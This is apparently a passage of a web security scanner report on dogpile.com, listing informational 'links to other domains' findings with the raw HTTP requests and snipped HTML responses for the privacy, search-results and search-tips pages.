<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content=" save searches, adult filter, languages"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.53. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/privacy/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.export.gov/safeharbor/
http://www.infospaceinc.com/about/
http://www.infospaceinc.com/privacy.aspx
http://www.mercantila.com/
http://www.networkadvertising.org/optout_nonppii.asp

Request

GET /dogpile_other/ws/privacy/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=19652bf8c8fa44608972c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:36 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:36 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:36 GMT
Connection: close
Content-Length: 62217
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="privacy, policy" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
Dogpile. For our general information collection, use and disclosure practices,
please review our global company privacy policy located on the InfoSpace corporate website:
<a href="http://www.infospaceinc.com/privacy.aspx">InfoSpace Privacy</a>
...[SNIP]...
rs, available at www.networkadvertising.org (the "NAI Principles").
If you would like to opt-out from these services, you may go to the NAI Non-PII Opt-Out Page,
located at <a href="http://www.networkadvertising.org/optout_nonppii.asp">http://www.networkadvertising.org/optout_nonppii.asp</a>
...[SNIP]...
to the Safe Harbor Program developed by the US Department of Commerce and the European
Commission. For more information about the Safe Harbor Program, please go to
<a href="http://www.export.gov/safeharbor/">http://www.export.gov/safeharbor/</a>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.54. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/add_btn_new.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/
http://www.webposition.com/?icl_cid=WP51

Request

GET /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8ae6cde94044449ca746c16a3af0cb01&ActionId=8e3deae18a0e4ecc8d67c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:19 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:19 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:19 GMT; path=/
Set-Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678119866; path=/
Set-Cookie: wsRecent=Submit+Site,Web,Relevance,&Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:19 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 159318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
ent="submit, submits, site, sites, web, search, search engine, metasearch, meta search, yellow pages, white pages, image search, audio search, video search, news search, dogpile" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl45" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_SearchResultsFor_SearchResultsAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20"><img id="icePage_SearchResultsFor_SearchResultsAddThis_AddThisButton" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/add_btn_new.gif/_iceUrlFlag=15?_IceUrl=true" alt="Bookmark and Share" style="border-width:0px;border:0;position: relative;top: 2px;" /></a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<br />
<a class="resultLink" href="http://www.webposition.com/?icl_cid=WP51"><strong>
...[SNIP]...
<span class="resultUrl"><a class="resultUrl" href="http://www.webposition.com/?icl_cid=WP51">www.WebPosition.com</a>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
                   <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
               </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.55. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/tips/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/tips/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=294411f494334594af40c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:49 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:49 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:48 GMT
Connection: close
Content-Length: 43936
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="search tips, help, advanced search, search engine help" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
